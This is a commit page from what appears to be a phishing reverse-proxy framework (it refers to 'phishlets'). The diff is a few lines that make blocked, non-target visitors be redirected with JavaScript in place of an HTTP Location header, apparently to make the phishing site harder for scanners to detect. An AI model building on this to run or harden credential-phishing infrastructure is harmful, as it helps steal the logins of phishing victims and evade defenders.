blocked requests redirected with javascript

kgretzky · Aug 24, 2023 · a8d2cd3 · a8d2cd3 · jvolker1 · Aug 28, 2023
1 parent 7a959bb
commit a8d2cd3
Show file tree

Hide file tree

Showing 2 changed files with 2 additions and 5 deletions.
diff --git a/CHANGELOG b/CHANGELOG
@@ -6,6 +6,7 @@
 - Feature: You can now override globally set unauthorized redirect URL per phishlet with `phishlet unauth_url <phishlet> <url>`.
 - Fixed: Disabled caching for HTML and Javascript content to make on-the-fly proxied content replacements and injections more reliable.
 - Fixed: Improved JS injection by adding `<script src"...">` references into HTML pages, instead of dumping the whole script there.
+- Fixed: Blocked requests will now redirect using javascript, instead of HTTP location header.
 - Fixed: Changed `redirect_url` to `unauth_url` in global config to avoid confusion.
 - Fixed: Fixed HTTP status code response for Javascript redirects.
 - Fixed: Javascript redirects now happen on `text/html` pages with valid HTML content.

diff --git a/core/http_proxy.go b/core/http_proxy.go
@@ -1155,11 +1155,7 @@ func (p *HttpProxy) blockRequest(req *http.Request) (*http.Request, *http.Respon
 	}
 
 	if redirect_url != "" {
-		resp := goproxy.NewResponse(req, "text/html", http.StatusFound, "")
-		if resp != nil {
-			resp.Header.Add("Location", redirect_url)
-			return req, resp
-		}
+		return p.javascriptRedirect(req, redirect_url)
 	} else {
 		resp := goproxy.NewResponse(req, "text/html", http.StatusForbidden, "")
 		if resp != nil {